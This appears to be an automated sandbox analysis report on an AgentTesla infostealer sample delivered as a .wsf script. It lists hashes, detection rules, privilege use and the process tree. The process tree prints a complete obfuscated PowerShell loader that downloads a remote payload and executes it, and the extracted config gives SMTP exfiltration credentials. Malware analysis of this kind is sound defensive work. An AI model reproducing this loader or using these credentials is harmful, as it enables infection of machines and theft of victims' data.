Analysis
-
max time kernel
145s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
13-02-2024 05:38
Static task
static1
Behavioral task
behavioral1
Sample
d9002ae6089045126350070c7b0790b4eb478e9b764bfdae3ee61e2e62a0e277.wsf
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
d9002ae6089045126350070c7b0790b4eb478e9b764bfdae3ee61e2e62a0e277.wsf
Resource
win10v2004-20231222-en
General
-
Target
d9002ae6089045126350070c7b0790b4eb478e9b764bfdae3ee61e2e62a0e277.wsf
-
Size
2KB
-
MD5
380c9e85f6960add801843076c33ec3b
-
SHA1
53f4ebaa47e325b25feaf22211dcff9223dc2ccc
-
SHA256
d9002ae6089045126350070c7b0790b4eb478e9b764bfdae3ee61e2e62a0e277
-
SHA512
88e6a1f62735e5116041dfa23c0a3743f3f31b6372c4af698323e7eddd028eff7d10bb83b883bda6e3aa2171827efb661eacd7e7d7db4ca8891919b134986e35
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.knoow.net - Port:
587 - Username:
[email protected] - Password:
americanboy21@ - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect packed .NET executables. Mostly AgentTeslaV4. 1 IoCs
resource yara_rule behavioral2/memory/3416-17-0x0000000000400000-0x0000000000442000-memory.dmp INDICATOR_EXE_Packed_GEN01 -
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 1 IoCs
resource yara_rule behavioral2/memory/3416-17-0x0000000000400000-0x0000000000442000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers -
Detects executables manipulated with Fody 1 IoCs
resource yara_rule behavioral2/memory/4468-14-0x000002B8E8070000-0x000002B8E8096000-memory.dmp INDICATOR_EXE_Packed_Fody -
Detects executables packed with Costura DotNetGuard 1 IoCs
resource yara_rule behavioral2/memory/4468-14-0x000002B8E8070000-0x000002B8E8096000-memory.dmp INDICATOR_EXE_Packed_Costura -
Detects executables referencing Windows vault credential objects. Observed in infostealers 1 IoCs
resource yara_rule behavioral2/memory/3416-17-0x0000000000400000-0x0000000000442000-memory.dmp INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID -
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 1 IoCs
resource yara_rule behavioral2/memory/3416-17-0x0000000000400000-0x0000000000442000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store -
Detects executables referencing many email and collaboration clients. Observed in information stealers 1 IoCs
resource yara_rule behavioral2/memory/3416-17-0x0000000000400000-0x0000000000442000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients -
Detects executables referencing many file transfer clients. Observed in information stealers 1 IoCs
resource yara_rule behavioral2/memory/3416-17-0x0000000000400000-0x0000000000442000-memory.dmp INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients -
Blocklisted process makes network request 1 IoCs
flow pid Process 7 4468 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4468 set thread context of 3416 4468 powershell.exe 86 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4468 powershell.exe 4468 powershell.exe 3416 InstallUtil.exe 3416 InstallUtil.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
description pid Process Token: SeDebugPrivilege 4468 powershell.exe Token: SeIncreaseQuotaPrivilege 4468 powershell.exe Token: SeSecurityPrivilege 4468 powershell.exe Token: SeTakeOwnershipPrivilege 4468 powershell.exe Token: SeLoadDriverPrivilege 4468 powershell.exe Token: SeSystemProfilePrivilege 4468 powershell.exe Token: SeSystemtimePrivilege 4468 powershell.exe Token: SeProfSingleProcessPrivilege 4468 powershell.exe Token: SeIncBasePriorityPrivilege 4468 powershell.exe Token: SeCreatePagefilePrivilege 4468 powershell.exe Token: SeBackupPrivilege 4468 powershell.exe Token: SeRestorePrivilege 4468 powershell.exe Token: SeShutdownPrivilege 4468 powershell.exe Token: SeDebugPrivilege 4468 powershell.exe Token: SeSystemEnvironmentPrivilege 4468 powershell.exe Token: SeRemoteShutdownPrivilege 4468 powershell.exe Token: SeUndockPrivilege 4468 powershell.exe Token: SeManageVolumePrivilege 4468 powershell.exe Token: 33 4468 powershell.exe Token: 34 4468 powershell.exe Token: 35 4468 powershell.exe Token: 36 4468 powershell.exe Token: SeIncreaseQuotaPrivilege 4468 powershell.exe Token: SeSecurityPrivilege 4468 powershell.exe Token: SeTakeOwnershipPrivilege 4468 powershell.exe Token: SeLoadDriverPrivilege 4468 powershell.exe Token: SeSystemProfilePrivilege 4468 powershell.exe Token: SeSystemtimePrivilege 4468 powershell.exe Token: SeProfSingleProcessPrivilege 4468 powershell.exe Token: SeIncBasePriorityPrivilege 4468 powershell.exe Token: SeCreatePagefilePrivilege 4468 powershell.exe Token: SeBackupPrivilege 4468 powershell.exe Token: SeRestorePrivilege 4468 powershell.exe Token: SeShutdownPrivilege 4468 powershell.exe Token: SeDebugPrivilege 4468 powershell.exe Token: SeSystemEnvironmentPrivilege 4468 powershell.exe Token: SeRemoteShutdownPrivilege 4468 powershell.exe Token: SeUndockPrivilege 4468 powershell.exe Token: SeManageVolumePrivilege 4468 powershell.exe Token: 33 4468 powershell.exe Token: 34 4468 powershell.exe Token: 35 4468 powershell.exe Token: 36 4468 powershell.exe Token: SeDebugPrivilege 3416 InstallUtil.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 4692 wrote to memory of 4468 4692 WScript.exe 20 PID 4692 wrote to memory of 4468 4692 WScript.exe 20 PID 4468 wrote to memory of 3416 4468 powershell.exe 86 PID 4468 wrote to memory of 3416 4468 powershell.exe 86 PID 4468 wrote to memory of 3416 4468 powershell.exe 86 PID 4468 wrote to memory of 3416 4468 powershell.exe 86 PID 4468 wrote to memory of 3416 4468 powershell.exe 86 PID 4468 wrote to memory of 3416 4468 powershell.exe 86 PID 4468 wrote to memory of 3416 4468 powershell.exe 86 PID 4468 wrote to memory of 3416 4468 powershell.exe 86
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d9002ae6089045126350070c7b0790b4eb478e9b764bfdae3ee61e2e62a0e277.wsf"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $rt='x','e','I';[Array]::Reverse($rt);sal z ($rt -join '');$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$tpg='[void','] [Syst','em.Refle','ction.Asse','mbly]::LoadWi','thPartialName(''Microsoft.VisualBasic'')';z($tpg -join '');do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty55='(New-','Obje','ct Ne','t.We','bCli','ent)';$tty=z($tty55 -join '');$tty;$rot='Down','load','Str','ing';$rotJ=($rot -join '');$bnt='https','://didaktik-labor.de/mx1.jpg';$bntJ=($bnt -join '');$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bntJ);z($mv)2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3416
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82